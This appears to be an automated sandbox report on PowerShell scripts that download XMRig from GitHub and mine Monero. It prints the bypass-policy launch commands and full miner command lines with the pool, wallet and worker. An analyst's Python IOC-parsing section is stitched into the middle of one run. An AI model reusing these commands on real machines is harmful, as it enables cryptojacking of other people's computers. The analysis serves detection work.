SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kg3ru1f.1ny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

146s

Max time network

156s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qj5j5mlr.sys.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

142s

Max time network

112s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2e30gk4g.yru.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240226-en

Max time kernel

153s

Max time network

149s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 142.250.75.234:443 chromewebstore.googleapis.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icqscv2d.jct.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3364-10-0x000001E9A0D00000-0x000001E9A0D22000-memory.dmp

memory/3364-11-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-12-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-14-0x000001E9BB610000-0x000001E9BB622000-memory.dmp

memory/3364-15-0x000001E9BB600000-0x000001E9BB60A000-memory.dmp

memory/3364-16-0x00007FF8A2363000-0x00007FF8A2365000-memory.dmp

memory/3364-17-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-36-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3608-49-0x0000020D097B0000-0x0000020D097D0000-memory.dmp

memory/3364-50-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3608-51-0x0000020D09800000-0x0000020D09820000-memory.dmp

memory/3608-52-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-53-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-54-0x0000020D09820000-0x0000020D09840000-memory.dmp

memory/3608-55-0x0000020D9C3E0000-0x0000020D9C400000-memory.dmp

memory/3608-56-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-57-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-60-0x0000020D9C3E0000-0x0000020D9C400000-memory.dmp

memory/3608-59-0x0000020D09820000-0x0000020D09840000-memory.dmp

memory/3608-58-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-61-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-62-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-63-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-64-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-65-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-66-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-67-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

155s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
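The xmrig command line above is the most useful single artifact in this run. It names the algorithm (`-a rx`, RandomX), the pool (`rx.unmineable.com`, reached over stratum+ssl on port 443, which is why the mining session is an ordinary-looking TLS connection to 161.35.34.195:443 in the network table), a payout address and a worker name in unMineable's `COIN:address.worker` login format, and a placeholder password. The `SeLockMemoryPrivilege` rows under "Suspicious use of AdjustPrivilegeToken" are XMRig asking for the privilege it needs to back RandomX with large pages; the GitHub rows are the download of the miner that the PowerShell script performs before launching it.

The following Python is an added example and is not part of the sandbox report: it parses that command line into IOC fields, checks the PowerShell parent for the `-ExecutionPolicy bypass -File` launch pattern used in every run, and matches the pool host against the report's network rows so the stratum session is separated from the download traffic. The command line and network rows are copied from this report; the option table, the login regex and the Monero address sanity check (95 base58 characters, leading `4` or `8`) are my own assumptions about xmrig and unMineable conventions, not something the report states.

```python
"""Pull IOCs out of an XMRig command line and tie them to the sandbox network rows."""
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample input, copied from the behavioral7 run of this report.
XMRIG_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    r'.unmineable_worker_vilqtiac -p x'
)
PARENT_CMDLINE = r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"'
# Network rows from this report; the last one (taken from behavioral5) has no domain column.
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
GB 161.35.34.195:443 tcp
"""

# xmrig options that carry the IOCs (short and long spellings, as in xmrig --help).
OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
        "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# unMineable login layout COIN:address.worker (assumption, inferred from the -u value above).
LOGIN_RE = re.compile(r"^(?P<coin>[A-Z0-9]+):(?P<address>[^.]+)(?:\.(?P<worker>.+))?$")
# Base58 alphabet used by Monero addresses (no 0, O, I or l).
B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def parse_xmrig_cmdline(cmdline: str) -> dict:
    """Return image, algo, pool and wallet fields from an xmrig invocation."""
    # posix=False keeps Windows backslashes literal and leaves the quotes on the
    # token, so we strip them ourselves.
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    iocs = {"image": toks[0]}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("--") and "=" in tok:          # --url=... form
            key, val = tok.split("=", 1)
            if key in OPTS:
                iocs[OPTS[key]] = val
            i += 1
        elif tok in OPTS and i + 1 < len(toks):          # -o value form
            iocs[OPTS[tok]] = toks[i + 1]
            i += 2
        else:                                            # value-less flag or unknown option
            i += 1
    url = urlsplit(iocs.get("url", ""))
    iocs["pool_host"] = url.hostname
    iocs["pool_port"] = url.port
    iocs["pool_tls"] = url.scheme in ("stratum+ssl", "stratum+tls")
    m = LOGIN_RE.match(iocs.get("user", ""))
    if m:
        iocs.update(m.groupdict())
        a = m["address"]
        iocs["monero_address_valid"] = len(a) == 95 and a[0] in "48" and all(c in B58 for c in a)
    return iocs


def is_bypass_powershell(cmdline: str) -> bool:
    """True for the -ExecutionPolicy Bypass -File launch pattern (-ep / -ex prefixes accepted)."""
    return bool(re.search(r"-e[px]\w*\s+bypass\b", cmdline, re.I)
                and re.search(r"\s-f(ile)?\s", cmdline, re.I))


def correlate_pool(iocs: dict, rows: str) -> list:
    """Network rows whose domain column equals the pool host (DNS and TCP alike)."""
    hits = []
    for line in rows.splitlines():
        parts = line.split()
        if len(parts) != 4:        # row with a missing domain column: skip it, do not guess
            continue
        country, dest, domain, proto = parts
        if domain.lower() == iocs["pool_host"]:
            ip, _, port = dest.rpartition(":")
            hits.append({"country": country, "ip": ip, "port": int(port), "proto": proto})
    return hits


def pool_connection(iocs: dict, rows: str):
    """The TCP row on the pool's port, i.e. the stratum session itself, or None."""
    for h in correlate_pool(iocs, rows):
        if h["proto"] == "tcp" and h["port"] == iocs["pool_port"]:
            return h
    return None


if __name__ == "__main__":
    found = parse_xmrig_cmdline(XMRIG_CMDLINE)
    print(found)
    print("parent used ExecutionPolicy bypass:", is_bypass_powershell(PARENT_CMDLINE))
    print("stratum session:", pool_connection(found, NETWORK_ROWS))
```

The correlation deliberately skips rows whose domain column is empty, such as the `GB 161.35.34.195:443 tcp` row in behavioral5, rather than inferring the domain from the IP; if you want those counted, join on the IP returned here instead of on the hostname.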

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/2272-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pd0iyk5g.yax.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2272-1-0x0000025E9DCE0000-0x0000025E9DD02000-memory.dmp

memory/2272-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-15-0x0000025E9DE50000-0x0000025E9DE62000-memory.dmp

memory/2272-16-0x0000025E9D390000-0x0000025E9D39A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4068-47-0x00000252DC870000-0x00000252DC890000-memory.dmp

memory/4068-48-0x00000252DE2B0000-0x00000252DE2D0000-memory.dmp

memory/4068-49-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/2272-50-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-52-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/4068-51-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/2272-53-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/4068-55-0x0000025370EA0000-0x0000025370EC0000-memory.dmp

memory/4068-54-0x00000252DE2D0000-0x00000252DE2F0000-memory.dmp

memory/4068-56-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-57-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-58-0x00000252DE2D0000-0x00000252DE2F0000-memory.dmp

memory/4068-59-0x0000025370EA0000-0x0000025370EC0000-memory.dmp

memory/4068-60-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-61-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-62-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-63-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-64-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-65-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-66-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-67-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-68-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

148s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
